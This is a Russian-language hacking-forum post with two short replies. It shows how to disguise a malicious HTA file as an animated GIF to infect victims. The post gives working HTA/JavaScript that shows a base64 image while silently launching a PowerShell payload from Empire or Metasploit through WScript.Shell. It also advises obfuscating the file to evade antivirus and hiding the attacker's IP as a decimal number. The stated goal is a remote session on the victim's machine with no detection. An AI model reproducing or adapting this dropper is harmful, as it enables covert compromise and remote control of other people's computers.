Всем привет, решил описать как мне кажется веселый метод заражения наших с вами "любимых клиентов" Все будет как Мы любим, весело, легко и без палевно) Поехали!) Идем искать картинку (живую) то есть gif-ку .. была выбрана эта) далее нам по требуется код: генерируем powershell в Empire или Metasploit я выбрал .. >>>КОД СКРИПТА<<< <html> <head> <title>NazvanieGif</title> <hta:application id="NazvanieGif" border="thin" borderstyle="complex" maximizeButton="no" minimizeButton="no" /> </head> <script type="text/javascript"> var index = -1; var images = [ "data:image/gif;base64,"]; function initGallery(){ window.resizeTo(300,300); htaPayload(); nextPicture(); } function nextPicture(){ var img; index = index + 1; if (index > images.length -1 ){ index = 0; } img = document.getElementById("gallery"); img.src = images[index]; } function htaPayload(){ var payload=""; try{ if (navigator.userAgent.indexOf("Windows") !== -1){ new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false); } } catch(e){ } } </script> <style> #gallery, div { width: 100%; height: 100%; } #outer { text-align: center; } #inner{ display: inline-block; } body { background-color: black; } </style> <body onload="initGallery()"> <div id="outer"> <div id="inner"> <img id="gallery" onclick="nextPicture()"> </div> </div> </body> </html> и вставляем в 37 строчку, между) далее переходим на очень полезный онлайн ресурс иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последущего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1 127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433 так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в как видите в 17 строку) Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе сохраняем полученный код в блокноте, под любым именем но в формате .hta < -- что это за формат, у нас написано здесь Пингвиныч, привет!)) "Решил я продолжит твою темку)" Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и ДЕТЕКТА НЕТ!!
Очень криво скопировано. Все гиперссылки у тебя не являются гиперссылками. И зачем добавлять в конце "#моястатья", если ты тупо скопировал с другого форума?
Пойду добавлю в блокнот список расширений, которые мне не стоит открывать и одену шапочку из фольги. :warpath: Но правда, оформи тему, а то залупа. /del - он блокнут, а я долбаёб.